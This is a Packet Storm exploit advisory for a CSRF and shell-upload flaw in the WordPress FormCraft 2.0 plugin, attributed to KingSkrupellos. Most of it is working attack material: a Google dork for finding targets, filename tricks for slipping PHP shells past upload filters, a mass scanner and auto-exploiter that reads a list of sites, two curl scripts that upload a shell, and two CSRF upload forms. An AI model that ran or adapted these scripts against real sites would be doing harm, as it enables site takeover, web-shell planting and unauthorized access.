exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress FormCraft 2.0 CSRF / Shell Upload

WordPress FormCraft 2.0 CSRF / Shell Upload
Posted Mar 18, 2019
Authored by KingSkrupellos

WordPress version 5.0.4 with FormCraft plugin version 2.0 suffers from a cross site request forgery vulnerability that can be leveraged to perform a shell upload.

tags | exploit, shell, csrf
SHA-256 | 20fa2c83b5c931b82468320628286a4017adfdc722d3d66e7a4045518f19f4d8

WordPress FormCraft 2.0 CSRF / Shell Upload

Change Mirror Download
############################################################################################

# Exploit Title : WordPress 5.0.4 FormCraft Plugins 2.0 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepages : formcraft-wp.com ~ ncrafts.net ~ formcrafts.com
# Software Download Links : formcrafts.com/formcrafts-form-builder.zip
downloads.wordpress.org/plugin/formcraft-form-builder.zip
# Software Information Links : wordpress.org/plugins/formcraft-form-builder/
wpexplorer.com/formcraft-drag-drop-form-builder-wordpress-plugin/
codecanyon.net/item/formcraft-premium-wordpress-form-builder/5335056
formcrafts.com/integrations/wordpress
formcraft-wp.com/addons/stripe/
# Software Affected Version : 1.2.0 - 1.2.1 - 1.2.3 / 2.0 and All Versions
Compatible with WordPress [ Vulnerable WP Versions ] =>
3.6 - 4.2.2 - 4.2.7 - 4.5 - 4.9.9 - 4.9.1 - 5.0.x - 5.0.4
# Software Price Type : Free / Paid Download / 36$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/formcraft/''
# Vulnerability Type :
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# JVN : jvn.jp/en/jp/JVN83501605/index.html
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-wordpress-formcraft-auto-php-csrf-exploiter.html

############################################################################################

# Description about Software :
***************************
FormCraft is a drag-and-drop form builder to create and embed forms, and track submissions for WordPress.

############################################################################################

# Impact :
***********
* The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within

the product's environment. * Weaknesses in this category are related to the management of permissions, privileges, and

other security features that are used to perform access control. * This software has Cross Site Request Forgery Vulnerability

because the web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally

provided by the user who submitted the request.

* The vulnerability CSRF allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick the victim to visit a

specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as generat

new forms, insert JavaScript code to existing forms, and delete existing forms.

* WordPress FormCraft Plugins 2.0 and 1.2.3 and other versions is prone to a

vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process.

This may facilitate unauthorized access or privilege escalation; other attacks are also possible. WordPress 5.0.4

FormCraft 2.0 and 1.2.3 is vulnerable; prior versions may also be affected.

############################################################################################

Installation =>
*************
Extract the download package to a temporary location.
Zip the folder formcraft
Log in to WordPress and click on the Add New option under Plugins.
Click on the Upload link.
Click on Choose File and browse the zipped file formcraft and click on Install.
Now activate the plugin
If you are facing trouble with the file upload field, you need to set the permissions of the directory
/wp-content/plugins/formcraft/file-upload/server/ and sub directories, and files to 755

############################################################################################

# CSRF / PHP / Arbitrary File Upload / File Insertion Exploit :
*****************************************************
Vulnerability =>
**************
/wp-content/plugins/formcraft/file-upload/server/php/upload.php

/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Vulnerability Error =>
*********************
{"failed":"No file found 2"}

Directory File Path :
*******************
/wp-content/plugins/formcraft/file-upload/server/php/files/.....

/wp-content/plugins/formcraft/file-upload/server/content/files/....

/wp-content/plugins/formcraft/file-upload/server/php/files/[RANDOM-NUMBERS-WORDS]yourshellname.php

Note : yourfilename.html .txt .gif .png .gif - Try to upload your shell files extensions like this =>

SH3LL.php.pjpg - SH3LL.php;.gif - SH3LL.asp:,fla - SH3LL.phtml - SH3LL.php5 - SH3LL.php -

Sh3LL.asp;.jpeg - Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv - Sh3LL.php;.pjpg ;.jpeg and etcetra.....

Try on your Computer LocalHost.

Note 2 : If sites says like this " {"failed":"Not writable"} " The vulnerability has been fixed.

###########################################################################################

PHP Auto Exploitation Tool 1 =>
***************************
<?php
print"
Cyberizm WordPress FormCraft Scanner + Auto Exploiter
Mr. KingSkrupellos - Cyberizm Digital Security Team
";
error_reporting(0);
set_time_limit(0);

if(!file_exists($argv[1])){
die('
File Not Found
usage: php formcraft.php sites.txt

');
}
$file=@fopen('shell.phtml','a+');

$get=file_get_contents($argv[1]);
$ex=explode("\n",$get);
$c=file($argv[1]);
echo"Total target : ".count($c)."\n\n";

foreach($c as $sites){
echo "scanning site : $sites";
$sites=trim($sites);

$urlex='/wp-content/plugins/formcraft/file-upload/server/php/upload.php';
$url1=($sites).($urlex) ;
$get1=@file_get_contents($url1);
if(eregi('{"files":',$get1)){
echo"[!] HAHAHA VULNERABILITY FOUND :* [!]\n";

$kingskrupellos = "loader.php"; // loader.php = <?php phpinfo();
// plz readme
$ewe = array("files[]"=>"@$kingskrupellos");
$ch = curl_init("$sites/wp-content/plugins/formcraft/file-upload/server/php/");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $ewe);
$data = curl_exec ($ch);
curl_close ($ch);
echo "[+]Exploited: $data\n\n";
fwrite($file,"<a href="."$sites/wp-content/plugins/formcraft/file-upload/server/php/files/$kingskrupellos"." target="."_blank".">$sites/wp-content/plugins/formcraft/file-upload/server/php/files/$kingskrupellos"."</a><br>");
}else{
echo"NOT VULN\n\n";
}
}
print "
shell saved in shell.phtml
";
?>

###########################################################################################

PHP Exploiter Code 2 :
*********************
<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

###########################################################################################

PHP Exploiter Code 3 :
*********************
<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/formcraft/file-upload/server/php/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

###########################################################################################

CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

-------------------------------------------------------------------------------------------------------------------------------------------------------------

CSRF Cross Site Request Forgery Exploiter 2 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close